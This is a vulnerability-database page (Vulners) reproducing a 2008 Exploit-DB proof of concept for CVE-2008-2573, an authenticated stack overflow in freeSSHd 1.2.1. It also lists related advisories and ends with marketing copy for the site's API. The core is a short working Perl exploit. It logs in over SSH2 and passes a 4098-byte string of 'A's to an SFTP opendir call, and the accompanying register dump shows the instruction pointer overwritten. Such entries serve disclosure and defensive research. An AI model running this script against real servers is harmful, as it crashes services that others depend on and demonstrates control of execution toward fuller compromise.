Lucene search
+L

freeSSHd 1.2.1 - (Authenticated) Remote Stack Overflow (PoC)

🗓️ 31 May 2008 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

FreeSSHD remote Buffer Overflow version 1.2.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-2573
31 May 200800:00
circl
CVE
CVE-2008-2573
6 Jun 200818:00
cve
Cvelist
CVE-2008-2573
6 Jun 200818:00
cvelist
Exploit DB
freeSSHd 1.2.1 - (Authenticated) Remote Overflow (SEH)
6 Jun 200800:00
exploitdb
EUVD
EUVD-2008-2568
7 Oct 202500:30
euvd
NVD
CVE-2008-2573
6 Jun 200818:32
nvd
Prion
Stack overflow
6 Jun 200818:32
prion
###############################################################################
#  FreeSSHD remote Buffer Overflow
#
# Website: http://freesshd.com/
#
# Version:1.2.1
#
# Bug: Remote Buffer Overflow ( CD)
#
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000001 ebx=00000000 ecx=41414141 edx=00150608 esi=00c268f0 edi=00c268f0
#eip=41414141 esp=00127c10 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#41414141 ??              ???
#
# Poc:


use strict;
use Net::SSH2;
my $ip="127.0.0.1";
my $port=22;
my $user="YOUR_USER";
my $pass="YOUR_PASS";
my $ssh2 = Net::SSH2->new();
my $payload ="A" x 4098;
$ssh2->connect($ip, $port) || die "could not connect";
$ssh2->auth_password($user,$pass)|| die "wrong passwd/login";
print "Poc running ...\n";
my $sftp = $ssh2->sftp();
my $dir = $sftp->opendir($payload);
print "Buffer Overflow Successfull\n";
$ssh2->disconnect();
exit;

# milw0rm.com [2008-05-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 28.5
EPSS0.05614
32